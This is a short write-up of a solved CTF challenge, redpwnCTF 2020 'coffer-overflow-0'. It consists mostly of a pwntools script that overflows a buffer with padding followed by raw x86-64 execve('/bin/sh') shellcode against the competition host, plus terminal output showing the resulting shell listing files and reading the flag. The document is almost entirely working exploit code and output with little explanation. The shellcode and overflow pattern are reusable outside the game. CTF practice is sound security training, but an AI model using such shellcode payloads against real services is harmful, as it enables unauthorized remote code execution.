# (solved) pwn/coffer-overflow-0
```python
#!/usr/bin/python3
from pwn import *
shell64 = b"\x48\x31\xf6\x56\x48\xbf\x2f\x62\x69\x6e\x2f\x2f\x73\x68\x57\x54\x5f\x6a\x3b\x58\x99\x0f\x05"
r = remote('2020.redpwnc.tf', 31199)
#r = process('./coffer-overflow-0')
print(r.recvline())
print(r.recvuntil('What do you want to fill your coffer with?'))
r.sendline(b'A'*34 + shell64)
r.interactive()
```
```bash
root@STEVE:~/redpwn/coffer-overflow-0# ./doit.py
[+] Opening connection to 2020.redpwnc.tf on port 31199: Done
b'Welcome to coffer overflow, where our coffers are overfilling with bytes ;)\n'
b'What do you want to fill your coffer with?'
[*] Switching to interactive mode
$ ls
Makefile
bin
coffer-overflow-0
coffer-overflow-0.c
dev
flag.txt
lib
lib32
lib64
$ cat flag.txt
flag{b0ffer_0verf10w_3asy_as_123}
$
```